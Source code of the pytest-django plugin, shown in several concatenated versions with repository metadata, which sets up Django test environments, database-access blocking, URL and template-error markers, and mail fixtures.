if not request.config.getvalue('noforcenodebug'):
settings.DEBUG = False
setup_test_environment()
request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
"""The django cursor wrapper, internal to pytest-django.
This will globally disable all database access. The object
returned has a .enable() and a .disable() method which can be used
to temporarily enable database access.
"""
if not django_settings_is_configured():
return None
# util -> utils rename in Django 1.7
try:
import django.db.backends.utils
utils_module = django.db.backends.utils
except ImportError:
import django.db.backends.util
utils_module = django.db.backends.util
manager = CursorManager(utils_module)
manager.disable()
request.addfinalizer(manager.restore)
return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
"""Implement the django_db marker, internal to pytest-django.
This will dynamically request the ``db`` or ``transactional_db``
fixtures as required by the django_db marker.
"""
marker = request.keywords.get('django_db', None)
if marker:
validate_django_db(marker)
if marker.transaction:
request.getfuncargvalue('transactional_db')
else:
request.getfuncargvalue('db')
@pytest.fixture(autouse=True, scope='class')
def _django_setup_unittest(request, _django_cursor_wrapper):
"""Setup a django unittest, internal to pytest-django."""
if django_settings_is_configured() and is_django_unittest(request):
request.getfuncargvalue('_django_test_environment')
request.getfuncargvalue('_django_db_setup')
_django_cursor_wrapper.enable()
request.node.cls.__real_setUpClass()
def teardown():
request.node.cls.__real_tearDownClass()
_django_cursor_wrapper.restore()
request.addfinalizer(teardown)
@pytest.fixture(autouse=True, scope='function')
def _django_clear_outbox():
"""Clear the django outbox, internal to pytest-django."""
if django_settings_is_configured():
from django.core import mail
mail.outbox = []
@pytest.fixture(autouse=True, scope='function')
def _django_set_urlconf(request):
"""Apply the @pytest.mark.urls marker, internal to pytest-django."""
marker = request.keywords.get('urls', None)
if marker:
skip_if_no_django()
import django.conf
from django.core.urlresolvers import clear_url_caches
validate_urls(marker)
original_urlconf = django.conf.settings.ROOT_URLCONF
django.conf.settings.ROOT_URLCONF = marker.urls
clear_url_caches()
def restore():
django.conf.settings.ROOT_URLCONF = original_urlconf
request.addfinalizer(restore)
@pytest.fixture(autouse=True, scope='session')
def _fail_for_invalid_template_variable(request):
"""Fixture that fails for invalid variables in templates.
This fixture will fail each test that uses django template rendering
should a template contain an invalid template variable.
The fail message will include the name of the invalid variable and
in most cases the template name.
It does not raise an exception, but fails, as the stack trace doesn't
offer any helpful information to debug.
This behavior can be switched off using the marker:
``ignore_template_errors``
"""
class InvalidVarException(object):
"""Custom handler for invalid strings in templates."""
def __init__(self):
self.fail = True
def __contains__(self, key):
"""There is a test for '%s' in TEMPLATE_STRING_IF_INVALID."""
return key == '%s'
def _get_template(self):
from django.template import Template
stack = inspect.stack()
# finding the ``render`` needle in the stack
frame = reduce(
lambda x, y: y[3] == 'render' and 'base.py' in y[1] and y or x,
stack
)
# assert 0, stack
frame = frame[0]
# finding only the frame locals in all frame members
f_locals = reduce(
lambda x, y: y[0] == 'f_locals' and y or x,
inspect.getmembers(frame)
)[1]
# ``django.template.base.Template``
template = f_locals['self']
if isinstance(template, Template):
return template
def __mod__(self, var):
"""Handle TEMPLATE_STRING_IF_INVALID % var."""
template = self._get_template()
if template:
msg = "Undefined template variable '%s' in '%s'" % (var, template.name)
else:
msg = "Undefined template variable '%s'" % var
if self.fail:
pytest.fail(msg, pytrace=False)
else:
return msg
if os.environ.get(INVALID_TEMPLATE_VARS_ENV, 'false') == 'true':
if django_settings_is_configured():
import django
from django.conf import settings
if django.VERSION >= (1, 8) and settings.TEMPLATES:
settings.TEMPLATES[0]['OPTIONS']['string_if_invalid'] = InvalidVarException()
else:
settings.TEMPLATE_STRING_IF_INVALID = InvalidVarException()
@pytest.fixture(autouse=True)
def _template_string_if_invalid_marker(request):
"""Apply the @pytest.mark.ignore_template_errors marker,
internal to pytest-django."""
marker = request.keywords.get('ignore_template_errors', None)
if os.environ.get(INVALID_TEMPLATE_VARS_ENV, 'false') == 'true':
if marker and django_settings_is_configured():
import django
from django.conf import settings
if django.VERSION >= (1, 8) and settings.TEMPLATES:
settings.TEMPLATES[0]['OPTIONS']['string_if_invalid'].fail = False
else:
settings.TEMPLATE_STRING_IF_INVALID.fail = False
# ############### Helper Functions ################
class CursorManager(object):
"""Manager for django.db.backends.util.CursorWrapper.
This is the object returned by _django_cursor_wrapper.
If created with None as django.db.backends.util the object is a
no-op.
"""
def __init__(self, dbutil):
self._dbutil = dbutil
self._history = []
self._real_wrapper = dbutil.CursorWrapper
def _save_active_wrapper(self):
return self._history.append(self._dbutil.CursorWrapper)
def _blocking_wrapper(*args, **kwargs):
__tracebackhide__ = True
__tracebackhide__ # Silence pyflakes
pytest.fail('Database access not allowed, '
'use the "django_db" mark to enable it.')
def enable(self):
"""Enable access to the Django database."""
self._save_active_wrapper()
self._dbutil.CursorWrapper = self._real_wrapper
def disable(self):
"""Disable access to the Django database."""
self._save_active_wrapper()
self._dbutil.CursorWrapper = self._blocking_wrapper
def restore(self):
self._dbutil.CursorWrapper = self._history.pop()
def __enter__(self):
self.enable()
def __exit__(self, exc_type, exc_value, traceback):
self.restore()
def validate_django_db(marker):
"""Validate the django_db marker.
It checks the signature and creates the `transaction` attribute on
the marker which will have the correct value.
"""
def apifun(transaction=False):
marker.transaction = transaction
apifun(*marker.args, **marker.kwargs)
def validate_urls(marker):
"""Validate the urls marker.
It checks the signature and creates the `urls` attribute on the
marker which will have the correct value.
"""
def apifun(urls):
marker.urls = urls
apifun(*marker.args, **marker.kwargs)
| {
"repo_name": "pelme/pytest-django",
"path": "pytest_django/plugin.py",
"copies": "1",
"size": "17185",
"license": "bsd-3-clause",
"hash": 7000396604547846000,
"line_mean": 33.6471774194,
"line_max": 93,
"alpha_frac": 0.617107943,
"autogenerated": false,
"ratio": 4.225473321858864,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.0001181268709085208,
"num_lines": 496
} |
"""A pytest plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import inspect
from functools import reduce
import os
import sys
import types
import pytest
from .django_compat import is_django_unittest # noqa
from .fixtures import django_assert_num_queries # noqa
from .fixtures import django_assert_max_num_queries # noqa
from .fixtures import django_db_setup # noqa
from .fixtures import django_db_use_migrations # noqa
from .fixtures import django_db_keepdb # noqa
from .fixtures import django_db_createdb # noqa
from .fixtures import django_db_modify_db_settings # noqa
from .fixtures import django_db_modify_db_settings_parallel_suffix # noqa
from .fixtures import django_db_modify_db_settings_tox_suffix # noqa
from .fixtures import django_db_modify_db_settings_xdist_suffix # noqa
from .fixtures import _live_server_helper # noqa
from .fixtures import admin_client # noqa
from .fixtures import admin_user # noqa
from .fixtures import client # noqa
from .fixtures import db # noqa
from .fixtures import django_user_model # noqa
from .fixtures import django_username_field # noqa
from .fixtures import live_server # noqa
from .fixtures import django_db_reset_sequences # noqa
from .fixtures import rf # noqa
from .fixtures import settings # noqa
from .fixtures import transactional_db # noqa
from .lazy_django import django_settings_is_configured, skip_if_no_django
try:
import pathlib
except ImportError:
import pathlib2 as pathlib
SETTINGS_MODULE_ENV = "DJANGO_SETTINGS_MODULE"
CONFIGURATION_ENV = "DJANGO_CONFIGURATION"
INVALID_TEMPLATE_VARS_ENV = "FAIL_INVALID_TEMPLATE_VARS"
PY2 = sys.version_info[0] == 2
# pytest 4.2 handles unittest setup/teardown itself via wrapping fixtures.
_pytest_version_info = tuple(int(x) for x in pytest.__version__.split(".", 2)[:2])
_handle_unittest_methods = _pytest_version_info < (4, 2)
_report_header = []
# ############### pytest hooks ################
def pytest_addoption(parser):
group = parser.getgroup("django")
group.addoption(
"--reuse-db",
action="store_true",
dest="reuse_db",
default=False,
help="Re-use the testing database if it already exists, "
"and do not remove it when the test finishes.",
)
group.addoption(
"--create-db",
action="store_true",
dest="create_db",
default=False,
help="Re-create the database, even if it exists. This "
"option can be used to override --reuse-db.",
)
group.addoption(
"--ds",
action="store",
type=str,
dest="ds",
default=None,
help="Set DJANGO_SETTINGS_MODULE.",
)
group.addoption(
"--dc",
action="store",
type=str,
dest="dc",
default=None,
help="Set DJANGO_CONFIGURATION.",
)
group.addoption(
"--nomigrations",
"--no-migrations",
action="store_true",
dest="nomigrations",
default=False,
help="Disable Django migrations on test setup",
)
group.addoption(
"--migrations",
action="store_false",
dest="nomigrations",
default=False,
help="Enable Django migrations on test setup",
)
parser.addini(
CONFIGURATION_ENV, "django-configurations class to use by pytest-django."
)
group.addoption(
"--liveserver",
default=None,
help="Address and port for the live_server fixture.",
)
parser.addini(
SETTINGS_MODULE_ENV, "Django settings module to use by pytest-django."
)
parser.addini(
"django_find_project",
"Automatically find and add a Django project to the " "Python path.",
type="bool",
default=True,
)
group.addoption(
"--fail-on-template-vars",
action="store_true",
dest="itv",
default=False,
help="Fail for invalid variables in templates.",
)
parser.addini(
INVALID_TEMPLATE_VARS_ENV,
"Fail for invalid variables in templates.",
type="bool",
default=False,
)
PROJECT_FOUND = (
"pytest-django found a Django project in %s "
"(it contains manage.py) and added it to the Python path.\n"
'If this is wrong, add "django_find_project = false" to '
"pytest.ini and explicitly manage your Python path."
)
PROJECT_NOT_FOUND = (
"pytest-django could not find a Django project "
"(no manage.py file could be found). You must "
"explicitly add your Django project to the Python path "
"to have it picked up."
)
PROJECT_SCAN_DISABLED = (
"pytest-django did not search for Django "
"projects since it is disabled in the configuration "
'("django_find_project = false")'
)
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + "\n\n") if e.args else ""
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
def is_django_project(path):
try:
return path.is_dir() and (path / "manage.py").exists()
except OSError:
return False
def arg_to_path(arg):
# Test classes or functions can be appended to paths separated by ::
arg = arg.split("::", 1)[0]
return pathlib.Path(arg)
def find_django_path(args):
args = map(str, args)
args = [arg_to_path(x) for x in args if not x.startswith("-")]
cwd = pathlib.Path.cwd()
if not args:
args.append(cwd)
elif cwd not in args:
args.append(cwd)
for arg in args:
if is_django_project(arg):
return arg
for parent in arg.parents:
if is_django_project(parent):
return parent
return None
project_dir = find_django_path(args)
if project_dir:
sys.path.insert(0, str(project_dir.absolute()))
return PROJECT_FOUND % project_dir
return PROJECT_NOT_FOUND
def _setup_django():
if "django" not in sys.modules:
return
import django.conf
# Avoid force-loading Django when settings are not properly configured.
if not django.conf.settings.configured:
return
import django.apps
if not django.apps.apps.ready:
django.setup()
_blocking_manager.block()
def _get_boolean_value(x, name, default=None):
if x is None:
return default
if x in (True, False):
return x
possible_values = {"true": True, "false": False, "1": True, "0": False}
try:
return possible_values[x.lower()]
except KeyError:
raise ValueError(
"{} is not a valid value for {}. "
"It must be one of {}.".format(x, name, ", ".join(possible_values.keys()))
)
def pytest_load_initial_conftests(early_config, parser, args):
# Register the marks
early_config.addinivalue_line(
"markers",
"django_db(transaction=False): Mark the test as using "
"the Django test database. The *transaction* argument marks will "
"allow you to use real transactions in the test like Django's "
"TransactionTestCase.",
)
early_config.addinivalue_line(
"markers",
"urls(modstr): Use a different URLconf for this test, similar to "
"the `urls` attribute of Django's `TestCase` objects. *modstr* is "
"a string specifying the module of a URL config, e.g. "
'"my_app.test_urls".',
)
early_config.addinivalue_line(
"markers",
"ignore_template_errors(): ignore errors from invalid template "
"variables (if --fail-on-template-vars is used).",
)
options = parser.parse_known_args(args)
if options.version or options.help:
return
django_find_project = _get_boolean_value(
early_config.getini("django_find_project"), "django_find_project"
)
if django_find_project:
_django_project_scan_outcome = _add_django_project_to_path(args)
else:
_django_project_scan_outcome = PROJECT_SCAN_DISABLED
if (
options.itv
or _get_boolean_value(
os.environ.get(INVALID_TEMPLATE_VARS_ENV), INVALID_TEMPLATE_VARS_ENV
)
or early_config.getini(INVALID_TEMPLATE_VARS_ENV)
):
os.environ[INVALID_TEMPLATE_VARS_ENV] = "true"
def _get_option_with_source(option, envname):
if option:
return option, "option"
if envname in os.environ:
return os.environ[envname], "env"
cfgval = early_config.getini(envname)
if cfgval:
return cfgval, "ini"
return None, None
ds, ds_source = _get_option_with_source(options.ds, SETTINGS_MODULE_ENV)
dc, dc_source = _get_option_with_source(options.dc, CONFIGURATION_ENV)
if ds:
_report_header.append("settings: %s (from %s)" % (ds, ds_source))
os.environ[SETTINGS_MODULE_ENV] = ds
if dc:
_report_header.append("configuration: %s (from %s)" % (dc, dc_source))
os.environ[CONFIGURATION_ENV] = dc
# Install the django-configurations importer
import configurations.importer
configurations.importer.install()
# Forcefully load Django settings, throws ImportError or
# ImproperlyConfigured if settings cannot be loaded.
from django.conf import settings as dj_settings
with _handle_import_error(_django_project_scan_outcome):
dj_settings.DATABASES
_setup_django()
def pytest_report_header():
if _report_header:
return ["django: " + ", ".join(_report_header)]
@pytest.mark.trylast
def pytest_configure():
# Allow Django settings to be configured in a user pytest_configure call,
# but make sure we call django.setup()
_setup_django()
def _classmethod_is_defined_at_leaf(cls, method_name):
super_method = None
for base_cls in cls.__mro__[1:]: # pragma: no branch
super_method = base_cls.__dict__.get(method_name)
if super_method is not None:
break
assert super_method is not None, (
"%s could not be found in base classes" % method_name
)
method = getattr(cls, method_name)
try:
f = method.__func__
except AttributeError:
pytest.fail("%s.%s should be a classmethod" % (cls, method_name))
if PY2 and not (
inspect.ismethod(method)
and inspect.isclass(method.__self__)
and issubclass(cls, method.__self__)
):
pytest.fail("%s.%s should be a classmethod" % (cls, method_name))
return f is not super_method.__func__
_disabled_classmethods = {}
def _disable_class_methods(cls):
if cls in _disabled_classmethods:
return
_disabled_classmethods[cls] = (
# Get the classmethod object (not the resulting bound method),
# otherwise inheritance will be broken when restoring.
cls.__dict__.get("setUpClass"),
_classmethod_is_defined_at_leaf(cls, "setUpClass"),
cls.__dict__.get("tearDownClass"),
_classmethod_is_defined_at_leaf(cls, "tearDownClass"),
)
cls.setUpClass = types.MethodType(lambda cls: None, cls)
cls.tearDownClass = types.MethodType(lambda cls: None, cls)
def _restore_class_methods(cls):
(
setUpClass,
restore_setUpClass,
tearDownClass,
restore_tearDownClass,
) = _disabled_classmethods.pop(cls)
try:
del cls.setUpClass
except AttributeError:
raise
try:
del cls.tearDownClass
except AttributeError:
pass
if restore_setUpClass:
cls.setUpClass = setUpClass
if restore_tearDownClass:
cls.tearDownClass = tearDownClass
def pytest_runtest_setup(item):
if _handle_unittest_methods:
if django_settings_is_configured() and is_django_unittest(item):
_disable_class_methods(item.cls)
@pytest.hookimpl(tryfirst=True)
def pytest_collection_modifyitems(items):
# If Django is not configured we don't need to bother
if not django_settings_is_configured():
return
from django.test import TestCase, TransactionTestCase
def get_order_number(test):
if hasattr(test, "cls") and test.cls:
# Beware, TestCase is a subclass of TransactionTestCase
if issubclass(test.cls, TestCase):
return 0
if issubclass(test.cls, TransactionTestCase):
return 1
marker_db = test.get_closest_marker('django_db')
if marker_db:
transaction = validate_django_db(marker_db)[0]
if transaction is True:
return 1
else:
transaction = None
fixtures = getattr(test, 'fixturenames', [])
if "transactional_db" in fixtures:
return 1
if transaction is False:
return 0
if "db" in fixtures:
return 0
return 2
items[:] = sorted(items, key=get_order_number)
@pytest.fixture(autouse=True, scope="session")
def django_test_environment(request):
"""
Ensure that Django is loaded and has its testing environment setup.
XXX It is a little dodgy that this is an autouse fixture. Perhaps
an email fixture should be requested in order to be able to
use the Django email machinery just like you need to request a
db fixture for access to the Django database, etc. But
without duplicating a lot more of Django's test support code
we need to follow this model.
"""
if django_settings_is_configured():
_setup_django()
from django.conf import settings as dj_settings
from django.test.utils import setup_test_environment, teardown_test_environment
dj_settings.DEBUG = False
setup_test_environment()
request.addfinalizer(teardown_test_environment)
@pytest.fixture(scope="session")
def django_db_blocker():
"""Wrapper around Django's database access.
This object can be used to re-enable database access. This fixture is used
internally in pytest-django to build the other fixtures and can be used for
special database handling.
The object is a context manager and provides the methods
.unblock()/.block() and .restore() to temporarily enable database access.
This is an advanced feature that is meant to be used to implement database
fixtures.
"""
if not django_settings_is_configured():
return None
return _blocking_manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
"""Implement the django_db marker, internal to pytest-django.
This will dynamically request the ``db``, ``transactional_db`` or
``django_db_reset_sequences`` fixtures as required by the django_db marker.
"""
marker = request.node.get_closest_marker("django_db")
if marker:
transaction, reset_sequences = validate_django_db(marker)
if reset_sequences:
request.getfixturevalue("django_db_reset_sequences")
elif transaction:
request.getfixturevalue("transactional_db")
else:
request.getfixturevalue("db")
@pytest.fixture(autouse=True, scope="class")
def _django_setup_unittest(request, django_db_blocker):
"""Setup a django unittest, internal to pytest-django."""
if not django_settings_is_configured() or not is_django_unittest(request):
yield
return
# Fix/patch pytest.
# Before pytest 5.4: https://github.com/pytest-dev/pytest/issues/5991
# After pytest 5.4: https://github.com/pytest-dev/pytest-django/issues/824
from _pytest.monkeypatch import MonkeyPatch
def non_debugging_runtest(self):
self._testcase(result=self)
mp_debug = MonkeyPatch()
mp_debug.setattr("_pytest.unittest.TestCaseFunction.runtest", non_debugging_runtest)
request.getfixturevalue("django_db_setup")
cls = request.node.cls
with django_db_blocker.unblock():
if _handle_unittest_methods:
_restore_class_methods(cls)
cls.setUpClass()
_disable_class_methods(cls)
yield
_restore_class_methods(cls)
cls.tearDownClass()
else:
yield
if mp_debug:
mp_debug.undo()
@pytest.fixture(scope="function", autouse=True)
def _dj_autoclear_mailbox():
if not django_settings_is_configured():
return
from django.core import mail
del mail.outbox[:]
@pytest.fixture(scope="function")
def mailoutbox(django_mail_patch_dns, _dj_autoclear_mailbox):
if not django_settings_is_configured():
return
from django.core import mail
return mail.outbox
@pytest.fixture(scope="function")
def django_mail_patch_dns(monkeypatch, django_mail_dnsname):
from django.core import mail
monkeypatch.setattr(mail.message, "DNS_NAME", django_mail_dnsname)
@pytest.fixture(scope="function")
def django_mail_dnsname():
return "fake-tests.example.com"
@pytest.fixture(autouse=True, scope="function")
def _django_set_urlconf(request):
"""Apply the @pytest.mark.urls marker, internal to pytest-django."""
marker = request.node.get_closest_marker("urls")
if marker:
skip_if_no_django()
import django.conf
try:
from django.urls import clear_url_caches, set_urlconf
except ImportError:
# Removed in Django 2.0
from django.core.urlresolvers import clear_url_caches, set_urlconf
urls = validate_urls(marker)
original_urlconf = django.conf.settings.ROOT_URLCONF
django.conf.settings.ROOT_URLCONF = urls
clear_url_caches()
set_urlconf(None)
def restore():
django.conf.settings.ROOT_URLCONF = original_urlconf
# Copy the pattern from
# https://github.com/django/django/blob/master/django/test/signals.py#L152
clear_url_caches()
set_urlconf(None)
request.addfinalizer(restore)
@pytest.fixture(autouse=True, scope="session")
def _fail_for_invalid_template_variable():
"""Fixture that fails for invalid variables in templates.
This fixture will fail each test that uses django template rendering
should a template contain an invalid template variable.
The fail message will include the name of the invalid variable and
in most cases the template name.
It does not raise an exception, but fails, as the stack trace doesn't
offer any helpful information to debug.
This behavior can be switched off using the marker:
``pytest.mark.ignore_template_errors``
"""
class InvalidVarException(object):
"""Custom handler for invalid strings in templates."""
def __init__(self):
self.fail = True
def __contains__(self, key):
"""There is a test for '%s' in TEMPLATE_STRING_IF_INVALID."""
return key == "%s"
@staticmethod
def _get_origin():
stack = inspect.stack()
# Try to use topmost `self.origin` first (Django 1.9+, and with
# TEMPLATE_DEBUG)..
for f in stack[2:]:
func = f[3]
if func == "render":
frame = f[0]
try:
origin = frame.f_locals["self"].origin
except (AttributeError, KeyError):
continue
if origin is not None:
return origin
from django.template import Template
# finding the ``render`` needle in the stack
frame = reduce(
lambda x, y: y[3] == "render" and "base.py" in y[1] and y or x, stack
)
# assert 0, stack
frame = frame[0]
# finding only the frame locals in all frame members
f_locals = reduce(
lambda x, y: y[0] == "f_locals" and y or x, inspect.getmembers(frame)
)[1]
# ``django.template.base.Template``
template = f_locals["self"]
if isinstance(template, Template):
return template.name
def __mod__(self, var):
"""Handle TEMPLATE_STRING_IF_INVALID % var."""
origin = self._get_origin()
if origin:
msg = "Undefined template variable '%s' in '%s'" % (var, origin)
else:
msg = "Undefined template variable '%s'" % var
if self.fail:
pytest.fail(msg)
else:
return msg
if (
os.environ.get(INVALID_TEMPLATE_VARS_ENV, "false") == "true"
and django_settings_is_configured()
):
from django.conf import settings as dj_settings
if dj_settings.TEMPLATES:
dj_settings.TEMPLATES[0]["OPTIONS"][
"string_if_invalid"
] = InvalidVarException()
else:
dj_settings.TEMPLATE_STRING_IF_INVALID = InvalidVarException()
@pytest.fixture(autouse=True)
def _template_string_if_invalid_marker(request):
"""Apply the @pytest.mark.ignore_template_errors marker,
internal to pytest-django."""
marker = request.keywords.get("ignore_template_errors", None)
if os.environ.get(INVALID_TEMPLATE_VARS_ENV, "false") == "true":
if marker and django_settings_is_configured():
from django.conf import settings as dj_settings
if dj_settings.TEMPLATES:
dj_settings.TEMPLATES[0]["OPTIONS"]["string_if_invalid"].fail = False
else:
dj_settings.TEMPLATE_STRING_IF_INVALID.fail = False
@pytest.fixture(autouse=True, scope="function")
def _django_clear_site_cache():
"""Clears ``django.contrib.sites.models.SITE_CACHE`` to avoid
unexpected behavior with cached site objects.
"""
if django_settings_is_configured():
from django.conf import settings as dj_settings
if "django.contrib.sites" in dj_settings.INSTALLED_APPS:
from django.contrib.sites.models import Site
Site.objects.clear_cache()
# ############### Helper Functions ################
class _DatabaseBlockerContextManager(object):
def __init__(self, db_blocker):
self._db_blocker = db_blocker
def __enter__(self):
pass
def __exit__(self, exc_type, exc_value, traceback):
self._db_blocker.restore()
class _DatabaseBlocker(object):
"""Manager for django.db.backends.base.base.BaseDatabaseWrapper.
This is the object returned by django_db_blocker.
"""
def __init__(self):
self._history = []
self._real_ensure_connection = None
@property
def _dj_db_wrapper(self):
from django.db.backends.base.base import BaseDatabaseWrapper
# The first time the _dj_db_wrapper is accessed, we will save a
# reference to the real implementation.
if self._real_ensure_connection is None:
self._real_ensure_connection = BaseDatabaseWrapper.ensure_connection
return BaseDatabaseWrapper
def _save_active_wrapper(self):
return self._history.append(self._dj_db_wrapper.ensure_connection)
def _blocking_wrapper(*args, **kwargs):
__tracebackhide__ = True
__tracebackhide__ # Silence pyflakes
raise RuntimeError(
"Database access not allowed, "
'use the "django_db" mark, or the '
'"db" or "transactional_db" fixtures to enable it.'
)
def unblock(self):
"""Enable access to the Django database."""
self._save_active_wrapper()
self._dj_db_wrapper.ensure_connection = self._real_ensure_connection
return _DatabaseBlockerContextManager(self)
def block(self):
"""Disable access to the Django database."""
self._save_active_wrapper()
self._dj_db_wrapper.ensure_connection = self._blocking_wrapper
return _DatabaseBlockerContextManager(self)
def restore(self):
self._dj_db_wrapper.ensure_connection = self._history.pop()
_blocking_manager = _DatabaseBlocker()
def validate_django_db(marker):
"""Validate the django_db marker.
It checks the signature and creates the ``transaction`` and
``reset_sequences`` attributes on the marker which will have the
correct values.
A sequence reset is only allowed when combined with a transaction.
"""
def apifun(transaction=False, reset_sequences=False):
return transaction, reset_sequences
return apifun(*marker.args, **marker.kwargs)
def validate_urls(marker):
"""Validate the urls marker.
It checks the signature and creates the `urls` attribute on the
marker which will have the correct value.
"""
def apifun(urls):
return urls
return apifun(*marker.args, **marker.kwargs)
| {
"repo_name": "cloudera/hue",
"path": "desktop/core/ext-py/pytest-django-3.10.0/pytest_django/plugin.py",
"copies": "2",
"size": "25188",
"license": "apache-2.0",
"hash": -1936636759860216800,
"line_mean": 29.567961165,
"line_max": 88,
"alpha_frac": 0.6276798475,
"autogenerated": false,
"ratio": 4.063236005807388,
"config_test": true,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5690915853307388,
"avg_score": null,
"num_lines": null
} |
"""A py.test plugin which helps testing Django applications
This plugin handles creating and destroying the test environment and
test database and provides some useful text fixtures.
"""
import contextlib
import os
import sys
import types
import py
import pytest
from .django_compat import is_django_unittest
from .fixtures import (_django_db_setup, _live_server_helper, admin_client,
admin_user, client, db, django_user_model,
django_username_field, live_server, rf, settings,
transactional_db)
from .lazy_django import django_settings_is_configured, skip_if_no_django
# Silence linters for imported fixtures.
(_django_db_setup, _live_server_helper, admin_client, admin_user, client, db,
django_user_model, django_username_field, live_server, rf, settings,
transactional_db)
SETTINGS_MODULE_ENV = 'DJANGO_SETTINGS_MODULE'
CONFIGURATION_ENV = 'DJANGO_CONFIGURATION'
# ############### pytest hooks ################
def pytest_addoption(parser):
group = parser.getgroup('django')
group._addoption('--reuse-db',
action='store_true', dest='reuse_db', default=False,
help='Re-use the testing database if it already exists, '
'and do not remove it when the test finishes. This '
'option will be ignored when --no-db is given.')
group._addoption('--create-db',
action='store_true', dest='create_db', default=False,
help='Re-create the database, even if it exists. This '
'option will be ignored if not --reuse-db is given.')
group._addoption('--ds',
action='store', type='string', dest='ds', default=None,
help='Set DJANGO_SETTINGS_MODULE.')
group._addoption('--dc',
action='store', type='string', dest='dc', default=None,
help='Set DJANGO_CONFIGURATION.')
group._addoption('--nomigrations',
action='store_true', dest='nomigrations', default=False,
help='Disable Django 1.7 migrations on test setup')
parser.addini(CONFIGURATION_ENV,
'django-configurations class to use by pytest-django.')
group._addoption('--liveserver', default=None,
help='Address and port for the live_server fixture.')
parser.addini(SETTINGS_MODULE_ENV,
'Django settings module to use by pytest-django.')
parser.addini('django_find_project',
'Automatically find and add a Django project to the '
'Python path.',
default=True)
def _exists(path, ignore=EnvironmentError):
try:
return path.check()
except ignore:
return False
PROJECT_FOUND = ('pytest-django found a Django project in %s '
'(it contains manage.py) and added it to the Python path.\n'
'If this is wrong, add "django_find_project = false" to '
'pytest.ini and explicitly manage your Python path.')
PROJECT_NOT_FOUND = ('pytest-django could not find a Django project '
'(no manage.py file could be found). You must '
'explicitly add your Django project to the Python path '
'to have it picked up.')
PROJECT_SCAN_DISABLED = ('pytest-django did not search for Django '
'projects since it is disabled in the configuration '
'("django_find_project = false")')
@contextlib.contextmanager
def _handle_import_error(extra_message):
try:
yield
except ImportError as e:
django_msg = (e.args[0] + '\n\n') if e.args else ''
msg = django_msg + extra_message
raise ImportError(msg)
def _add_django_project_to_path(args):
args = [x for x in args if not str(x).startswith("-")]
if not args:
args = [py.path.local()]
for arg in args:
arg = py.path.local(arg)
for base in arg.parts(reverse=True):
manage_py_try = base.join('manage.py')
if _exists(manage_py_try):
sys.path.insert(0, str(base))
return PROJECT_FOUND % base
return PROJECT_NOT_FOUND
def _setup_django():
import django
if hasattr(django, 'setup'):
django.setup()
else:
# Emulate Django 1.7 django.setup() with get_models
from django.db.models import get_models
get_models()
def _parse_django_find_project_ini(x):
if x in (True, False):
return x
x = x.lower()
possible_values = {'true': True,
'false': False,
'1': True,
'0': False}
try:
return possible_values[x]
except KeyError:
raise ValueError('%s is not a valid value for django_find_project. '
'It must be one of %s.'
% (x, ', '.join(possible_values.keys())))
def pytest_load_initial_conftests(early_config, parser, args):
# Register the marks
early_config.addinivalue_line(
'markers',
'django_db(transaction=False): Mark the test as using '
'the django test database. The *transaction* argument marks will '
"allow you to use real transactions in the test like Django's "
'TransactionTestCase.')
early_config.addinivalue_line(
'markers',
'urls(modstr): Use a different URLconf for this test, similar to '
'the `urls` attribute of Django `TestCase` objects. *modstr* is '
'a string specifying the module of a URL config, e.g. '
'"my_app.test_urls".')
options = parser.parse_known_args(args)
django_find_project = _parse_django_find_project_ini(
early_config.getini('django_find_project'))
if django_find_project:
_django_project_scan_outcome = _add_django_project_to_path(args)
else:
_django_project_scan_outcome = PROJECT_SCAN_DISABLED
# Configure DJANGO_SETTINGS_MODULE
ds = (options.ds or
os.environ.get(SETTINGS_MODULE_ENV) or
early_config.getini(SETTINGS_MODULE_ENV))
# Configure DJANGO_CONFIGURATION
dc = (options.dc or
os.environ.get(CONFIGURATION_ENV) or
early_config.getini(CONFIGURATION_ENV))
if ds:
os.environ[SETTINGS_MODULE_ENV] = ds
if dc:
os.environ[CONFIGURATION_ENV] = dc
# Install the django-configurations importer
import configurations.importer
configurations.importer.install()
# Forcefully load django settings, throws ImportError or
# ImproperlyConfigured if settings cannot be loaded.
from django.conf import settings
with _handle_import_error(_django_project_scan_outcome):
settings.DATABASES
_setup_django()
@pytest.mark.trylast
def pytest_configure():
if django_settings_is_configured():
_setup_django()
def pytest_runtest_setup(item):
if django_settings_is_configured() and is_django_unittest(item):
cls = item.cls
if hasattr(cls, '__real_setUpClass'):
return
cls.__real_setUpClass = cls.setUpClass
cls.__real_tearDownClass = cls.tearDownClass
cls.setUpClass = types.MethodType(lambda cls: None, cls)
cls.tearDownClass = types.MethodType(lambda cls: None, cls)
@pytest.fixture(autouse=True, scope='session')
def _django_test_environment(request):
"""
Ensure that Django is loaded and has its testing environment setup.
XXX It is a little dodgy that this is an autouse fixture. Perhaps
an email fixture should be requested in order to be able to
use the Django email machinery just like you need to request a
db fixture for access to the Django database, etc. But
without duplicating a lot more of Django's test support code
we need to follow this model.
"""
if django_settings_is_configured():
from django.conf import settings
from .compat import setup_test_environment, teardown_test_environment
settings.DEBUG = False
setup_test_environment()
request.addfinalizer(teardown_test_environment)
@pytest.fixture(autouse=True, scope='session')
def _django_cursor_wrapper(request):
"""The django cursor wrapper, internal to pytest-django.
This will globally disable all database access. The object
returned has a .enable() and a .disable() method which can be used
to temporarily enable database access.
"""
if not django_settings_is_configured():
return None
# util -> utils rename in Django 1.7
try:
import django.db.backends.utils
utils_module = django.db.backends.utils
except ImportError:
import django.db.backends.util
utils_module = django.db.backends.util
manager = CursorManager(utils_module)
manager.disable()
request.addfinalizer(manager.restore)
return manager
@pytest.fixture(autouse=True)
def _django_db_marker(request):
"""Implement the django_db marker, internal to pytest-django.
This will dynamically request the ``db`` or ``transactional_db``
fixtures as required by the django_db marker.
"""
marker = request.keywords.get('django_db', None)
if marker:
validate_django_db(marker)
if marker.transaction:
request.getfuncargvalue('transactional_db')
else:
request.getfuncargvalue('db')
@pytest.fixture(autouse=True, scope='class')
